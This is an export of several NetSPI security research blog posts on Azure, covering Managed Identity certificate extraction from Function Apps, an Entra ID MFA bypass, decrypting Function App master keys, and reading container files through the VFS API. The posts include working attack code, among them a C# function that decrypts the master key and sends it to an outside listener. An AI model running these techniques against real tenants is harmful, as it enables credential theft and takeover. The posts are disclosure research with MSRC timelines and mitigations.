$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context to a variable. We then set the decryption key to the corresponding environmental variable, the IV to the start section of the of encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response. 

When building this code, we used an existing Function App in our subscription that had a managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed that there was a previously unnoticed “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 – Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 – Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It’s unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App with this method.


Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
Abusing Entra ID Misconfigurations to Bypass MFA https://www.netspi.com/blog/technical/cloud-penetration-testing/abusing-entra-id-misconfigurations-to-bypass-mfa/ Thu, 02 Nov 2023 14:00:00 +0000 https://www.netspi.com/?p=31386 While conducting an Entra Penetration Test, we discovered a simple misconfiguration in Entra ID that allowed us to bypass MFA.

The post Abusing Entra ID Misconfigurations to Bypass MFA appeared first on NetSPI.

]]>
On a recent external assessment, I stumbled upon a method to bypass a client’s MFA requirement:  access a single-sign on (SSO) token and leverage that token to access internal applications that—by policy—should have been locked behind an MFA prompt, all without triggering an MFA alert on the end-user’s mobile device. This was possible due to a misconfiguration in the client’s Entra ID Conditional Access Policy for third-party MFA and a first-party integration with the myaccount.microsoft.com portal. 

To understand the vulnerability, there are a few things to understand about the Entra ID authentication flow. Within any Entra ID environment, there are numerous cloud applications that are leveraged when a user authenticates. The application with the misconfiguration is “My Profile” which utilizes “My Account”, “My Apps”, and “My Signins” for additional functionality within the “My Profile” portal. These separate applications are unique and can be individually configured with conditional access policies.

For this vulnerability to be present, four specific requirements must first be met: 

  1. The attacker must have valid credentials to sign into the Entra ID domain. These credentials can be brute forced through password sprays, found in online dumps, or obtained through social engineering.
  2. Entra ID must be configured to use Duo authenticator (or potentially other third-party MFA provider solutions) as the only method for MFA per the instructions on the Duo website.
  3. The “Require Duo MFA” conditional access policy must be configured for “Select Cloud Apps” rather than “All Cloud Apps” (See Image 1 Below). 
  4. The cloud application “My Profile” must not be included in the conditional access policy while other applications utilized by the “My Profile” application — like “My Account” or “My Sign-Ins” — are included.
Image 1: Require Duo MFA Conditional access policy in a vulnerable state.
Source: https://duo.com/docs/azure-ca

When these four conditions are present in an Entra ID Environment, the myaccount.microsoft.com page loads fully into the browser and provides an SSO token to the user before the conditional access policy is executed and a redirect to the Duo authenticator domain occurs to enforce the MFA authentication.

This odd load-time behavior is what alerted me to the potential for an MFA bypass. See the video below to observe how, briefly, the myaccount.microsoft.com page loads fully into the browser window before the redirect to the MFA prompt domain occurs.

Vulnerable sign-in behavior when the four requirements above are met: note the short timeframe when the page fully loads before the authenticator redirect occurs.

In order to test whether this strange behavior was due to the myaccount.microsoft.com page not respecting the conditional access policy or a misconfiguration in the conditional access policy, in the testing environment we changed one variable—Assignments: All Cloud Apps—rather than the vulnerable “Select Cloud Apps.” The results of that test can be seen below and show that the authentication process on myaccount.microsoft.com functions in a manner where the page is not loaded into the browser prior to the MFA prompt.

Expected secure sign-in behavior when three of the four requirements above are met. In this case, the conditional access policy was configured to fire on “All Cloud Apps” rather than “Select Cloud Apps”: note the myaccount.microsoft.com page does not appear before the redirect to Duo.

The exploit to bypass the misconfiguration is trivial. Using Burp Suite, or an HTTP/s proxying software of your choosing, simply proxy the traffic while authenticating to the myaccount.microsoft.com portal and manually forward packets until there is enough content loaded for you to select a new element on the page and add that to the navigation flow. If the packets are manually forwarded and a new element is selected before the authorization redirect to the Duo portal is loaded into the page, the attacker is able to navigate through the myaccount.microsoft.com portal to access internal applications and manipulate user account details such as password and MFA devices prior to authorization with MFA.

Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and pausing the flow before the MFA Authentication redirect occurs.
Authenticating to the myaccount.microsoft.com portal while proxying through Burp Suite and demonstrating the ability to access the “update security info” page to manually edit security information for the account.

Limitations:

While this misconfiguration can lead to compromise of internal resources, there are some limitations to what it can accomplish that are all based on client-configurations within the conditional access policies. 

Since cloud-native Microsoft 365 applications are typically configured as part of the conditional access policy that requires MFA, this attack is not useful for accessing M365 resources such as Word Online, Teams, Outlook, or other Microsoft applications through the My Apps portal. Likewise, any other cloud applications that are configured to require multi-factor authentication will still be protected even when being accessed through the My Apps portal. There is also not a known method to elevate this basic token to a more robust token to access portals such as portal.office.com or entra.microsoft.com.

During testing and work with the Microsoft Security and Response Center, we examined four different Microsoft Entra ID environments. Of these four environments, only two contained the application “My Profile”. I compared licensing, where possible, and found no correlation between licensing and the existence of the “My Profile” application within the tenant.

I attempted to bypass this limitation in environments that did not contain the application by adding the application ID to the conditional access policy using the Entra ID PowerShell Modules. This was unsuccessful for the environments that didn’t list the application since it appears that those environments do not recognize the application by ID or name. 

Microsoft has been made aware of this odd behavior within the Entra Tenants and is working on a solution to address the lack of “My Profile” applications in some tenants.

Effectiveness of the attack: 

Many organizations must balance user-experience and convenience with security measures. When implementing a multi-factor authentication policy at an organization, many users do not want to approve multiple notifications just to access a single application. Many organizations will implement a structure of protecting the initial sign in or externally facing applications with MFA when being accessed from untrusted networks and leaving applications only accessible from trusted zones unsecured with MFA. 

In this example, and in real-world tests, bypassing the MFA prompt on myaccount.microsoft.com allowed the attacker to pause web application pages from loading and navigate from a non-trusted zone myaccount.microsoft.com portal to the trusted zone of myapps.microsoft.com without providing an MFA token and access business data on internal applications. 

The business logic behind the decision to not enforce MFA on these internal applications is valid, as the initial MFA prompt should have been completed before being able to access the myapps.microsoft.com portal. However, this vulnerability takes advantage of a slight delay in timing and allows the attacker access to a valid SSO token before authenticating with Duo authenticator and bypasses the business logic in place to prevent access to internal applications without MFA. 

Additionally, finding a multifactor-authentication provider that functions well with all vendors and applications leveraged by a business is nearly impossible. As MFA continues to become a business standard process and procedure across domains, multi-factor authentication providers have varying levels of support with the numerous cloud applications within a business environment. These limitations provide ample targets for attackers looking to leverage this vulnerability against Entra ID subscribers who are only applying MFA requirements through conditional access policies to specific applications either due to business-requirements or lack of support with the specific multi-factor vendor. 

Remediation:

In the environments that do have the “My Profile” Enterprise application to ensure the MFA prompt is triggered at the correct time when the user navigates to the myaccount.microsoft.com portal, the tenant administrator must configure a conditional access policy to target the “My Profile” application.

In the environments that did not include “My Profile” the only method to enforce MFA on myaccount.microsoft.com is to enforce MFA on “All Cloud Applications.” Since the “My Profile” application does not appear in all environments, the misconfiguration occurs from users believing all first-party Microsoft applications are covered by the conditional access policy. 

Conclusion: 

Although basic in its implementation and execution, finding this vulnerability was a stark reminder that although complex security systems are in use across enterprises, sometimes a simple misconfiguration can lead to compromise of secure data within the environment with minimal time investment or technical knowledge. As a penetration tester, it is easy to get bogged down in the technicalities of complex exploits and the prestige that comes along with executing a complex exploit chain. But sometimes it’s good to remember that simple misconfigurations with simple exploits can cause just as much damage to an environment and it is always good to check the basics.

Find more stories like these in our Azure Pentesting eBook.

Azure Cloud Penetration Testing Stories

The post Abusing Entra ID Misconfigurations to Bypass MFA appeared first on NetSPI.

]]>
What the Function: Decrypting Azure Function App Keys  https://www.netspi.com/blog/technical/cloud-penetration-testing/what-the-function-decrypting-azure-function-app-keys/ Sat, 12 Aug 2023 18:30:00 +0000 https://www.netspi.com/?p=30784 When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys.

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TLDR; 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it’s worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the “encrypted” parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure: 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  1. Rotating Shared Access Keys. 
  1. Limiting the creation of privileged, long lasting SAS tokens. 
  1. Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!) 
  1. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  1. Avoid using shared Storage Accounts for multiple Functions. 
  1. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 – Initial report created
02/13/2023 – Case closed as expected and documented behavior
03/08/2023 – Second report created
04/25/2023 – MSRC confirms original assessment as expected and documented behavior 
08/12/2023 – DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

The post What the Function: Decrypting Azure Function App Keys  appeared first on NetSPI.

]]>
Escalating Privileges with Azure Function Apps https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-function-apps/ Thu, 23 Mar 2023 13:24:36 +0000 https://www.netspi.com/?p=29749 Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers.

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP. Net encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes
ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel
ativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/
tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/
/ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3
fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="
https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
